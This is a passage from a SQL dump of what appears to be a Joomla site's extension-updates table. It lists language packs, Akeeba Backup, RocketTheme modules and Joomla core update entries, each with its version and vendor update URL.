Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14383,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14384,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14385,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14386,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14387,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14388,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14389,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14390,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14391,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14392,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14393,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14394,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14395,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14396,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14397,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14398,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14399,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14400,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14401,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14402,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14403,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14404,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14405,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14406,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14407,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14408,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14409,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14410,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14411,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14412,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14413,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14414,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14415,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14416,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14417,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14418,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14419,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14420,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14421,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14422,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14423,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(14424,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14425,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14426,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14427,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14428,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14429,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14430,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14431,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14432,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14433,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14434,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14435,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14436,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14437,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14438,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14439,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14440,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14441,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14442,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14443,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14444,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14445,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14446,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14447,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14448,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14449,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14450,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14451,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14452,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14453,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14454,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14455,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14456,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14457,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14458,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14459,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14460,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14461,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14462,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14463,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14464,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14465,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14466,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14467,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14468,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14469,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14470,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14471,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14472,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14473,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14474,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14475,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14476,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14477,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14478,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14479,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14480,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14481,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14482,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14483,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14484,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14485,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14486,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14487,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14488,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14489,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14490,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14491,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14492,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14493,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14494,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14495,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14496,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14497,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14498,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14499,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14500,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14501,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14502,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14503,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14504,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14505,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14506,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14507,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14508,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14509,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14510,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14511,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14512,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14513,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14514,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14515,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14516,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14517,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14518,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14519,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14520,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14521,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14522,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14523,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14524,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14525,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14526,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14527,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14528,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14529,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14530,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14531,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14532,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14533,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14534,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(14536,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14537,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14538,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14539,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14540,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14541,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14542,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14543,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14544,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14545,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14546,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14547,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14548,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14549,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14550,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14551,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14552,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14553,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14554,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14555,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14556,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14557,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14558,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14559,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14560,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14561,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14562,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14563,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14564,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14565,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14566,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14567,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14568,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14569,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14570,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14571,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14572,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14573,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14574,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14575,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14576,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14577,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14578,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14579,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14580,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14581,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14582,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14583,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14584,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14585,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14586,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14587,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14588,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14589,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14590,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14591,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14592,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14593,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14594,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14595,3,0,'Portuguese 